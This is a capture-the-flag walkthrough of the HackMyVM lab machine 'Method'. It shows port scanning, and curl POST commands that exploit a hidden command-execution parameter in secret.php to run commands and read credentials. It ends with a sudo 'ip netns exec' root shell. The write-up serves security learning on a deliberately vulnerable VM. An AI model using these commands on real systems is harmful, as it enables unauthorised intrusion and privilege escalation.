Method – Writeup – HackMyVM – Walkthrough

Method is an easy machine by avijneyam from the HackMyVM platform. This machine requires a bit of enumeration and understanding of web technology. Once we get the foothold, this is a piece of cake. The machine works quite well on VirtualBox. “Method – Writeup – HackMyVM – Walkthrough”

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Method

Identify the target

As usual, I started the exploitation by knowing the IP address of the target. This can easily be done using tools like netdiscover, arp-scan, fping, etc.

sudo netdiscover -r 10.0.0.0/24
The IP address of the target is 10.0.0.85

Scan open ports

Next, I scanned open ports on the target.

nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.85
The Nmap scan results

Here, we only have ports 22 and 80 to enumerate further.

Enumerate the webserver

There are some rabbit holes in the machines. However, using nikto, we can find the thing we want. Nevertheless, we can also do the same manually. The main thing in this machine is the sitemap.xml file.

The sitemap.xml file

This is a major hint and also a major distraction. Here, if we look closely, there is an ‘index.htm?vm=Brain’ part in the URL. We know that HackMyVM has PHP in its backend and there is no such URL. But, we can look for index.htm in the server.

The index.htm page

Let’s check the source of the page.

The source page

There is a hidden form that brings us suspicions. There is an input “HackMyVM” on the form.

curl 'http://10.0.0.85/secret.php?HackMyVM=id'
The GET method gives a message

It looked like the GET method is not the correct way. So, I did the same in the POST method.

curl -X POST 'http://10.0.0.85/secret.php' -d 'HackMyVM=id' -H 'Content-Type: application/x-www-form-urlencoded'
The POST method gives remote command execution

Furthermore, we can also spawn a reverse shell by encoding the reverse shell spawning command in URL-encoded format. However, I checked the source of the secret.php page to get the username and password.

curl -X POST 'http://10.0.0.85/secret.php' -d 'HackMyVM=cat secret.php' -H 'Content-Type: application/x-www-form-urlencoded'
The credentials of the user prakasaka

Privilege escalation

I logged in as the user prakasaka using the SSH server.

The SSH shell of the user prakasaka

Then, I checked the sudo permissions that gave me the root shell from the binary “ip”.

sudo -l
The sudo permissions of prakasaka

Reference: https://gtfobins.github.io/gtfobins/ip/#sudo

sudo ip netns add foo
sudo ip netns exec foo /bin/bash
sudo ip netns delete foo
The root shell

Also read: Walkthrough of Hack Me Please from Vulnhub

0 0 votes
Article Rating
Subscribe
Notify of
guest
3 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments